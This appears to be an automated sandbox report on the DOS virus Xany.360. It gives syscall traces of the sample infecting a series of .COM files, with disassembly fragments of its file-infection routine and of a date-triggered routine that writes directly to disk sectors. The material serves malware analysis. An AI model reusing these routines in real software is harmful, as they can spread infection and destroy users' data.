Sample viewer

vx.netlux.org/Virus.DOS.Xany.360

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T21:52:50.304541535Z 53 PC: 12ab7 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T21:52:50.30613914Z 37 PC: 12ac6 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T21:52:50.307408929Z 26 PC: 12ace | Set disk transfer address
2018-12-17T21:52:50.308474378Z 78 PC: 12b6d | Find first file
2018-12-17T21:52:50.31474945Z 67 PC: 12b94 | Get or set file attributes
2018-12-17T21:52:50.321049025Z 67 PC: 12b9d | Get or set file attributes
2018-12-17T21:52:50.337102791Z 61 PC: 12ba6 | Open file (Filename = 'SLEEP.COM')
2018-12-17T21:52:50.34361689Z 63 PC: 12baf | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:52:50.348187912Z 66 PC: 12bb7 | Move file pointer
2018-12-17T21:52:50.349293626Z 44 PC: 12bbc | Get time 0x12bbc: xchg ax, dx
0x12bbd: mov cx, 0x168
0x12bc0: push cs
0x12bc1: pop ds
0x12bc2: mov dx, si
0x12bc4: sub dx, cx
0x12bc6: add cl, al
0x12bc8: mov ah, 0x40
0x12bca: int 0x21
0x12bcc: mov ax, 0x4200
0x12bcf: xor cx, cx
0x12bd1: cdq
0x12bd2: int 0x21
0x12bd4: mov cl, 3
0x12bd6: pop ax
0x12bd7: push di
0x12bd8: sub ax, cx
0x12bda: mov di, si
0x12bdc: sub di, cx
0x12bde: mov dx, di
2018-12-17T21:52:50.350806806Z 64 PC: 12bcc | Write file or device (Write 422 bytes on handle 5)
2018-12-17T21:52:50.355886028Z 66 PC: 12bd4 | Move file pointer
2018-12-17T21:52:50.356859941Z 64 PC: 12bea | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:52:50.360855828Z 87 PC: 12bef | Get or set file date and time
2018-12-17T21:52:50.362733024Z 87 PC: 12bfa | Get or set file date and time
2018-12-17T21:52:50.364576246Z 62 PC: 12bfe | Close file
2018-12-17T21:52:50.372754066Z 67 PC: 12c06 | Get or set file attributes
2018-12-17T21:52:50.38535966Z 79 PC: 12b6d | Find next file
2018-12-17T21:52:50.388345318Z 67 PC: 12b94 | Get or set file attributes
2018-12-17T21:52:50.394220693Z 67 PC: 12b9d | Get or set file attributes
2018-12-17T21:52:50.400819886Z 61 PC: 12ba6 | Open file (Filename = 'PRINT.COM')
2018-12-17T21:52:50.404811198Z 63 PC: 12baf | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:52:50.40964362Z 66 PC: 12bb7 | Move file pointer
2018-12-17T21:52:50.41149598Z 44 PC: 12bbc | Get time 0x12bbc: xchg ax, dx
0x12bbd: mov cx, 0x168
0x12bc0: push cs
0x12bc1: pop ds
0x12bc2: mov dx, si
0x12bc4: sub dx, cx
0x12bc6: add cl, al
0x12bc8: mov ah, 0x40
0x12bca: int 0x21
0x12bcc: mov ax, 0x4200
0x12bcf: xor cx, cx
0x12bd1: cdq
0x12bd2: int 0x21
0x12bd4: mov cl, 3
0x12bd6: pop ax
0x12bd7: push di
0x12bd8: sub ax, cx
0x12bda: mov di, si
0x12bdc: sub di, cx
0x12bde: mov dx, di
2018-12-17T21:52:50.413639113Z 64 PC: 12bcc | Write file or device (Write 427 bytes on handle 5)
2018-12-17T21:52:50.416143195Z 66 PC: 12bd4 | Move file pointer
2018-12-17T21:52:50.417648598Z 64 PC: 12bea | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:52:50.419351953Z 87 PC: 12bef | Get or set file date and time
2018-12-17T21:52:50.420263713Z 87 PC: 12bfa | Get or set file date and time
2018-12-17T21:52:50.421708904Z 62 PC: 12bfe | Close file
2018-12-17T21:52:50.426511368Z 67 PC: 12c06 | Get or set file attributes
2018-12-17T21:52:50.43792037Z 79 PC: 12b6d | Find next file
2018-12-17T21:52:50.441239453Z 67 PC: 12b94 | Get or set file attributes
2018-12-17T21:52:50.446572401Z 67 PC: 12b9d | Get or set file attributes
2018-12-17T21:52:50.456853835Z 61 PC: 12ba6 | Open file (Filename = 'HELLO.COM')
2018-12-17T21:52:50.463125603Z 63 PC: 12baf | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:52:50.469493606Z 66 PC: 12bb7 | Move file pointer
2018-12-17T21:52:50.470750088Z 44 PC: 12bbc | Get time 0x12bbc: xchg ax, dx
0x12bbd: mov cx, 0x168
0x12bc0: push cs
0x12bc1: pop ds
0x12bc2: mov dx, si
0x12bc4: sub dx, cx
0x12bc6: add cl, al
0x12bc8: mov ah, 0x40
0x12bca: int 0x21
0x12bcc: mov ax, 0x4200
0x12bcf: xor cx, cx
0x12bd1: cdq
0x12bd2: int 0x21
0x12bd4: mov cl, 3
0x12bd6: pop ax
0x12bd7: push di
0x12bd8: sub ax, cx
0x12bda: mov di, si
0x12bdc: sub di, cx
0x12bde: mov dx, di
2018-12-17T21:52:50.474028838Z 64 PC: 12bcc | Write file or device (Write 433 bytes on handle 5)
2018-12-17T21:52:50.480588175Z 66 PC: 12bd4 | Move file pointer
2018-12-17T21:52:50.481874737Z 64 PC: 12bea | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:52:50.488675319Z 87 PC: 12bef | Get or set file date and time
2018-12-17T21:52:50.490207516Z 87 PC: 12bfa | Get or set file date and time
2018-12-17T21:52:50.49180304Z 62 PC: 12bfe | Close file
2018-12-17T21:52:50.499530555Z 67 PC: 12c06 | Get or set file attributes
2018-12-17T21:52:50.509851016Z 79 PC: 12b6d | Find next file
2018-12-17T21:52:50.512411878Z 67 PC: 12b94 | Get or set file attributes
2018-12-17T21:52:50.517809028Z 67 PC: 12b9d | Get or set file attributes
2018-12-17T21:52:50.527660037Z 61 PC: 12ba6 | Open file (Filename = 'PHANG.COM')
2018-12-17T21:52:50.534516086Z 63 PC: 12baf | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:52:50.541039448Z 66 PC: 12bb7 | Move file pointer
2018-12-17T21:52:50.542830521Z 44 PC: 12bbc | Get time 0x12bbc: xchg ax, dx
0x12bbd: mov cx, 0x168
0x12bc0: push cs
0x12bc1: pop ds
0x12bc2: mov dx, si
0x12bc4: sub dx, cx
0x12bc6: add cl, al
0x12bc8: mov ah, 0x40
0x12bca: int 0x21
0x12bcc: mov ax, 0x4200
0x12bcf: xor cx, cx
0x12bd1: cdq
0x12bd2: int 0x21
0x12bd4: mov cl, 3
0x12bd6: pop ax
0x12bd7: push di
0x12bd8: sub ax, cx
0x12bda: mov di, si
0x12bdc: sub di, cx
0x12bde: mov dx, di
2018-12-17T21:52:50.544887194Z 64 PC: 12bcc | Write file or device (Write 438 bytes on handle 5)
2018-12-17T21:52:50.547448856Z 66 PC: 12bd4 | Move file pointer
2018-12-17T21:52:50.548985532Z 64 PC: 12bea | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:52:50.551486362Z 87 PC: 12bef | Get or set file date and time
2018-12-17T21:52:50.553002369Z 87 PC: 12bfa | Get or set file date and time
2018-12-17T21:52:50.555550979Z 62 PC: 12bfe | Close file
2018-12-17T21:52:50.563243637Z 67 PC: 12c06 | Get or set file attributes
2018-12-17T21:52:50.573358932Z 79 PC: 12b6d | Find next file
2018-12-17T21:52:50.576630982Z 79 PC: 12b6d | Find next file
2018-12-17T21:52:50.579214104Z 67 PC: 12b94 | Get or set file attributes
2018-12-17T21:52:50.584809795Z 67 PC: 12b9d | Get or set file attributes
2018-12-17T21:52:50.598927121Z 61 PC: 12ba6 | Open file (Filename = 'MANDEL.COM')
2018-12-17T21:52:50.605707172Z 63 PC: 12baf | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:52:50.612183747Z 66 PC: 12bb7 | Move file pointer
2018-12-17T21:52:50.614845142Z 44 PC: 12bbc | Get time 0x12bbc: xchg ax, dx
0x12bbd: mov cx, 0x168
0x12bc0: push cs
0x12bc1: pop ds
0x12bc2: mov dx, si
0x12bc4: sub dx, cx
0x12bc6: add cl, al
0x12bc8: mov ah, 0x40
0x12bca: int 0x21
0x12bcc: mov ax, 0x4200
0x12bcf: xor cx, cx
0x12bd1: cdq
0x12bd2: int 0x21
0x12bd4: mov cl, 3
0x12bd6: pop ax
0x12bd7: push di
0x12bd8: sub ax, cx
0x12bda: mov di, si
0x12bdc: sub di, cx
0x12bde: mov dx, di
2018-12-17T21:52:50.617696344Z 64 PC: 12bcc | Write file or device (Write 444 bytes on handle 5)
2018-12-17T21:52:50.625766848Z 66 PC: 12bd4 | Move file pointer
2018-12-17T21:52:50.628223255Z 64 PC: 12bea | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:52:50.635718729Z 87 PC: 12bef | Get or set file date and time
2018-12-17T21:52:50.637430339Z 87 PC: 12bfa | Get or set file date and time
2018-12-17T21:52:50.639627735Z 62 PC: 12bfe | Close file
2018-12-17T21:52:50.647539821Z 67 PC: 12c06 | Get or set file attributes
2018-12-17T21:52:50.659149472Z 79 PC: 12b6d | Find next file
2018-12-17T21:52:50.663375997Z 79 PC: 12b6d | Find next file
2018-12-17T21:52:50.666263441Z 67 PC: 12b94 | Get or set file attributes
2018-12-17T21:52:50.672366132Z 67 PC: 12b9d | Get or set file attributes
2018-12-17T21:52:50.682908372Z 61 PC: 12ba6 | Open file (Filename = 'TEST.COM')
2018-12-17T21:52:50.690552964Z 63 PC: 12baf | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:52:50.697101533Z 66 PC: 12bb7 | Move file pointer
2018-12-17T21:52:50.698802766Z 44 PC: 12bbc | Get time 0x12bbc: xchg ax, dx
0x12bbd: mov cx, 0x168
0x12bc0: push cs
0x12bc1: pop ds
0x12bc2: mov dx, si
0x12bc4: sub dx, cx
0x12bc6: add cl, al
0x12bc8: mov ah, 0x40
0x12bca: int 0x21
0x12bcc: mov ax, 0x4200
0x12bcf: xor cx, cx
0x12bd1: cdq
0x12bd2: int 0x21
0x12bd4: mov cl, 3
0x12bd6: pop ax
0x12bd7: push di
0x12bd8: sub ax, cx
0x12bda: mov di, si
0x12bdc: sub di, cx
0x12bde: mov dx, di
2018-12-17T21:52:50.702193344Z 64 PC: 12bcc | Write file or device (Write 449 bytes on handle 5)
2018-12-17T21:52:50.709619418Z 66 PC: 12bd4 | Move file pointer
2018-12-17T21:52:50.711313351Z 64 PC: 12bea | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:52:50.715351421Z 87 PC: 12bef | Get or set file date and time
2018-12-17T21:52:50.71702036Z 87 PC: 12bfa | Get or set file date and time
2018-12-17T21:52:50.718793093Z 62 PC: 12bfe | Close file
2018-12-17T21:52:50.727499584Z 67 PC: 12c06 | Get or set file attributes
2018-12-17T21:52:50.737388637Z 79 PC: 12b6d | Find next file
2018-12-17T21:52:50.740133133Z 78 PC: 12b6d | Find first file
2018-12-17T21:52:50.749967356Z 67 PC: 12b94 | Get or set file attributes
2018-12-17T21:52:50.756531255Z 67 PC: 12b9d | Get or set file attributes
2018-12-17T21:52:51.117478987Z 61 PC: 12ba6 | Open file (Filename = 'C:\DOS\EDIT.COM')
2018-12-17T21:52:51.130432476Z 63 PC: 12baf | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:52:51.141795577Z 66 PC: 12bb7 | Move file pointer
2018-12-17T21:52:51.145222797Z 44 PC: 12bbc | Get time 0x12bbc: xchg ax, dx
0x12bbd: mov cx, 0x168
0x12bc0: push cs
0x12bc1: pop ds
0x12bc2: mov dx, si
0x12bc4: sub dx, cx
0x12bc6: add cl, al
0x12bc8: mov ah, 0x40
0x12bca: int 0x21
0x12bcc: mov ax, 0x4200
0x12bcf: xor cx, cx
0x12bd1: cdq
0x12bd2: int 0x21
0x12bd4: mov cl, 3
0x12bd6: pop ax
0x12bd7: push di
0x12bd8: sub ax, cx
0x12bda: mov di, si
0x12bdc: sub di, cx
0x12bde: mov dx, di
2018-12-17T21:52:51.15238895Z 64 PC: 12bcc | Write file or device (Write 360 bytes on handle 5)
2018-12-17T21:52:51.159038457Z 66 PC: 12bd4 | Move file pointer
2018-12-17T21:52:51.160737372Z 64 PC: 12bea | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:52:51.167463649Z 87 PC: 12bef | Get or set file date and time
2018-12-17T21:52:51.169487474Z 87 PC: 12bfa | Get or set file date and time
2018-12-17T21:52:51.171245963Z 62 PC: 12bfe | Close file
2018-12-17T21:52:51.178940089Z 67 PC: 12c06 | Get or set file attributes
2018-12-17T21:52:51.188416733Z 79 PC: 12b6d | Find next file
2018-12-17T21:52:51.190546462Z 67 PC: 12b94 | Get or set file attributes
2018-12-17T21:52:51.194520304Z 67 PC: 12b9d | Get or set file attributes
2018-12-17T21:52:51.202975546Z 61 PC: 12ba6 | Open file (Filename = 'C:\DOS\FORMAT.COM')
2018-12-17T21:52:51.210024719Z 63 PC: 12baf | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:52:51.215816483Z 66 PC: 12bb7 | Move file pointer
2018-12-17T21:52:51.21819343Z 44 PC: 12bbc | Get time 0x12bbc: xchg ax, dx
0x12bbd: mov cx, 0x168
0x12bc0: push cs
0x12bc1: pop ds
0x12bc2: mov dx, si
0x12bc4: sub dx, cx
0x12bc6: add cl, al
0x12bc8: mov ah, 0x40
0x12bca: int 0x21
0x12bcc: mov ax, 0x4200
0x12bcf: xor cx, cx
0x12bd1: cdq
0x12bd2: int 0x21
0x12bd4: mov cl, 3
0x12bd6: pop ax
0x12bd7: push di
0x12bd8: sub ax, cx
0x12bda: mov di, si
0x12bdc: sub di, cx
0x12bde: mov dx, di
2018-12-17T21:52:51.220539106Z 64 PC: 12bcc | Write file or device (Write 366 bytes on handle 5)
2018-12-17T21:52:51.227713194Z 66 PC: 12bd4 | Move file pointer
2018-12-17T21:52:51.230235387Z 64 PC: 12bea | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:52:51.233184977Z 87 PC: 12bef | Get or set file date and time
2018-12-17T21:52:51.23477772Z 87 PC: 12bfa | Get or set file date and time
2018-12-17T21:52:51.237343585Z 62 PC: 12bfe | Close file
2018-12-17T21:52:51.243885355Z 67 PC: 12c06 | Get or set file attributes
2018-12-17T21:52:51.254228447Z 79 PC: 12b6d | Find next file
2018-12-17T21:52:51.257617174Z 67 PC: 12b94 | Get or set file attributes
2018-12-17T21:52:51.263562516Z 67 PC: 12b9d | Get or set file attributes
2018-12-17T21:52:51.273254703Z 61 PC: 12ba6 | Open file (Filename = 'C:\DOS\KEYB.COM')
2018-12-17T21:52:51.2810947Z 63 PC: 12baf | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:52:51.287023072Z 66 PC: 12bb7 | Move file pointer
2018-12-17T21:52:51.288615445Z 44 PC: 12bbc | Get time 0x12bbc: xchg ax, dx
0x12bbd: mov cx, 0x168
0x12bc0: push cs
0x12bc1: pop ds
0x12bc2: mov dx, si
0x12bc4: sub dx, cx
0x12bc6: add cl, al
0x12bc8: mov ah, 0x40
0x12bca: int 0x21
0x12bcc: mov ax, 0x4200
0x12bcf: xor cx, cx
0x12bd1: cdq
0x12bd2: int 0x21
0x12bd4: mov cl, 3
0x12bd6: pop ax
0x12bd7: push di
0x12bd8: sub ax, cx
0x12bda: mov di, si
0x12bdc: sub di, cx
0x12bde: mov dx, di
2018-12-17T21:52:51.291796101Z 64 PC: 12bcc | Write file or device (Write 371 bytes on handle 5)
2018-12-17T21:52:51.298870727Z 66 PC: 12bd4 | Move file pointer
2018-12-17T21:52:51.300405908Z 64 PC: 12bea | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:52:51.304348528Z 87 PC: 12bef | Get or set file date and time
2018-12-17T21:52:51.305777122Z 87 PC: 12bfa | Get or set file date and time
2018-12-17T21:52:51.307329565Z 62 PC: 12bfe | Close file
2018-12-17T21:52:51.314184597Z 67 PC: 12c06 | Get or set file attributes
2018-12-17T21:52:51.325131563Z 79 PC: 12b6d | Find next file
2018-12-17T21:52:51.331146189Z 67 PC: 12b94 | Get or set file attributes
2018-12-17T21:52:51.338194149Z 67 PC: 12b9d | Get or set file attributes
2018-12-17T21:52:51.347767411Z 61 PC: 12ba6 | Open file (Filename = 'C:\DOS\SYS.COM')
2018-12-17T21:52:51.354939094Z 63 PC: 12baf | Read file or device (Read 3 bytes on handle 5)
2018-12-17T21:52:51.361625479Z 66 PC: 12bb7 | Move file pointer
2018-12-17T21:52:51.363143125Z 44 PC: 12bbc | Get time 0x12bbc: xchg ax, dx
0x12bbd: mov cx, 0x168
0x12bc0: push cs
0x12bc1: pop ds
0x12bc2: mov dx, si
0x12bc4: sub dx, cx
0x12bc6: add cl, al
0x12bc8: mov ah, 0x40
0x12bca: int 0x21
0x12bcc: mov ax, 0x4200
0x12bcf: xor cx, cx
0x12bd1: cdq
0x12bd2: int 0x21
0x12bd4: mov cl, 3
0x12bd6: pop ax
0x12bd7: push di
0x12bd8: sub ax, cx
0x12bda: mov di, si
0x12bdc: sub di, cx
0x12bde: mov dx, di
2018-12-17T21:52:51.365394152Z 64 PC: 12bcc | Write file or device (Write 377 bytes on handle 5)
2018-12-17T21:52:51.373315534Z 66 PC: 12bd4 | Move file pointer
2018-12-17T21:52:51.374790712Z 64 PC: 12bea | Write file or device (Write 3 bytes on handle 5)
2018-12-17T21:52:51.377567547Z 87 PC: 12bef | Get or set file date and time
2018-12-17T21:52:51.379880102Z 87 PC: 12bfa | Get or set file date and time
2018-12-17T21:52:51.381391166Z 62 PC: 12bfe | Close file
2018-12-17T21:52:51.388484364Z 67 PC: 12c06 | Get or set file attributes
2018-12-17T21:52:51.398968361Z 79 PC: 12b6d | Find next file
2018-12-17T21:52:51.406110962Z 42 PC: 12b19 | Get date 0x12b19: cmp dl, 0xd
0x12b1c: je 0x12b22
0x12b1e: cmp al, 1
0x12b20: jne 0x12b3f
0x12b22: xor ax, ax
0x12b24: push cs
0x12b25: pop ds
0x12b26: mov bx, si
0x12b28: mov cx, 1
0x12b2b: cdq
0x12b2c: push ax
0x12b2d: int 0x25
0x12b2f: pop ax
0x12b30: mov byte ptr [si + 0x1a], 0
0x12b34: pop ax
0x12b35: push ax
0x12b36: int 0x26
0x12b38: pop ax
0x12b39: pop ax
0x12b3a: inc ax

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":294,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:40:25.124919429Z 53 PC: 12ab7 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:40:25.126368986Z 37 PC: 12ac6 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:40:25.127299831Z 26 PC: 12ace | Set disk transfer address
2018-12-25T11:40:25.12816502Z 78 PC: 12b6d | Find first file
2018-12-25T11:40:25.134610113Z 67 PC: 12b94 | Get or set file attributes
2018-12-25T11:40:25.139981444Z 67 PC: 12b9d | Get or set file attributes
2018-12-25T11:40:25.159070675Z 61 PC: 12ba6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:40:25.165715976Z 63 PC: 12baf | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:40:25.172019092Z 66 PC: 12bb7 | Move file pointer
2018-12-25T11:40:25.173299761Z 44 PC: 12bbc | Get time 0x12bbc: xchg ax, dx
0x12bbd: mov cx, 0x168
0x12bc0: push cs
0x12bc1: pop ds
0x12bc2: mov dx, si
0x12bc4: sub dx, cx
0x12bc6: add cl, al
0x12bc8: mov ah, 0x40
0x12bca: int 0x21
0x12bcc: mov ax, 0x4200
0x12bcf: xor cx, cx
0x12bd1: cdq
0x12bd2: int 0x21
0x12bd4: mov cl, 3
0x12bd6: pop ax
0x12bd7: push di
0x12bd8: sub ax, cx
0x12bda: mov di, si
0x12bdc: sub di, cx
0x12bde: mov dx, di
2018-12-25T11:40:25.175622006Z 64 PC: 12bcc | Write file or device (Write 436 bytes on handle 5)
2018-12-25T11:40:25.183616355Z 66 PC: 12bd4 | Move file pointer
2018-12-25T11:40:25.184784595Z 64 PC: 12bea | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:40:25.190969039Z 87 PC: 12bef | Get or set file date and time
2018-12-25T11:40:25.19278202Z 87 PC: 12bfa | Get or set file date and time
2018-12-25T11:40:25.19411448Z 62 PC: 12bfe | Close file
2018-12-25T11:40:25.202453228Z 67 PC: 12c06 | Get or set file attributes
2018-12-25T11:40:25.212925789Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.216288679Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.221671806Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.231547093Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:25.237994123Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:25.244179175Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:25.246021505Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:25.248065181Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:25.250553163Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:25.252270668Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:25.25474373Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:25.255938807Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:25.257671942Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:25.264875367Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:25.274405589Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.277304223Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.283299003Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.292660569Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:25.299268375Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:25.305336992Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:25.306558848Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:25.308853272Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:25.316398849Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:25.31752499Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:25.325477129Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:25.326694846Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:25.327984824Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:25.335597234Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:25.345538799Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.348118915Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.354651749Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.364813695Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:25.37109159Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:25.378343916Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:25.380687522Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:25.382832683Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:25.385490056Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:25.387286654Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:25.389752604Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:25.391095Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:25.392811218Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:25.39991216Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:25.41222006Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.415201972Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.417532904Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.425409473Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.435728512Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:25.439813753Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:25.445966755Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:25.447726124Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:25.449220897Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:25.46233412Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:25.46481838Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:25.47176397Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:25.473403999Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:25.476444102Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:25.484154672Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:25.494749414Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.497971796Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.500302629Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.505820909Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.51573899Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:25.526983929Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:25.533616122Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:25.535327117Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:25.537969321Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:25.544657563Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:25.546940232Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:25.549618272Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:25.550882698Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:25.552963251Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:25.560425807Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:25.569971295Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.572852226Z 78 PC: 12b6d | Find first file (See above)
2018-12-25T11:40:25.581817547Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.587603607Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.925393241Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:25.932022458Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:25.937805392Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:25.93928785Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:25.941749753Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:25.948056927Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:25.949691907Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:25.955503256Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:25.956766538Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:25.958043668Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:25.965133922Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:25.975445069Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.978340238Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.987115573Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.996386802Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:26.003294944Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:26.009675854Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:26.0117461Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:26.014228321Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:26.022745905Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:26.024190902Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:26.027296552Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:26.029573319Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:26.03132497Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:26.038378434Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:26.308437691Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:26.311410003Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:26.317923701Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:26.373204602Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:26.380869563Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:26.386561338Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:26.391174011Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:26.393248438Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:26.400604141Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:26.403102344Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:26.405830169Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:26.406945495Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:26.409270676Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:26.415879292Z 67 PC: 12c06 | Get or set file attributes (See above)
